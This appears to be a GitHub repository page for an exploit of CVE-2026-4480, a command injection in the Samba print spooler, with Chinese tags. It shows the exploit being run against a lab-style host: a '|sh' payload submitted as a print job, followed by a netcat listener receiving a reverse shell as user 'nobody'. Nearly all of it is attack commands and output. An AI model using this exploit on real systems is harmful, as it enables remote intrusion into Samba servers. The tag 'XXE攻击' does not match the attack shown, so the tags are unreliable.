robinxiang/CVE-2026-4480

执行 exploit： ``` python ./exploit.py -t 10.129.20.16 -l 10.10.14.172 -p 8487 [*] Target: 10.129.20.16 [*] Callback: 10.10.14.172:8487 [*] Verify mode: False [+] Credentials initialized (anonymous) [+] Connected to spoolss interface [+] Opened printer: HP-Reception [+] Created DocumentInfo with payload: |sh [+] Generated payload (78 bytes) [*] Starting document... [*] Starting page... [*] Writing payload (78 bytes)... [*] Ending page... [*] Ending document (TRIGGERING EXPLOIT)... [+] Print job submitted successfully! [+] Closed printer handle [+] Exploit completed! [*] Check your listener for reverse shell... ``` nc -lvnp 8487 ``` ─$ nc -lvnp 8487 listening on [any] 8487 ... connect to [10.10.14.172] from (UNKNOWN) [10.129.20.16] 40590 bash: cannot set terminal process group (16403): Inappropriate ioctl for device bash: no job control in this shell nobody@abducted:/var/spool/samba$ whoami whoami nobody nobody@abducted:/var/spool/samba$ id id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) nobody@abducted:/var/spool/samba$ ```

标签：Prisma Cloud, Python, Samba, XXE攻击, 反弹Shell, 威胁模拟, 安全, 打印后台处理服务, 无后门, 超时处理, 逆向工具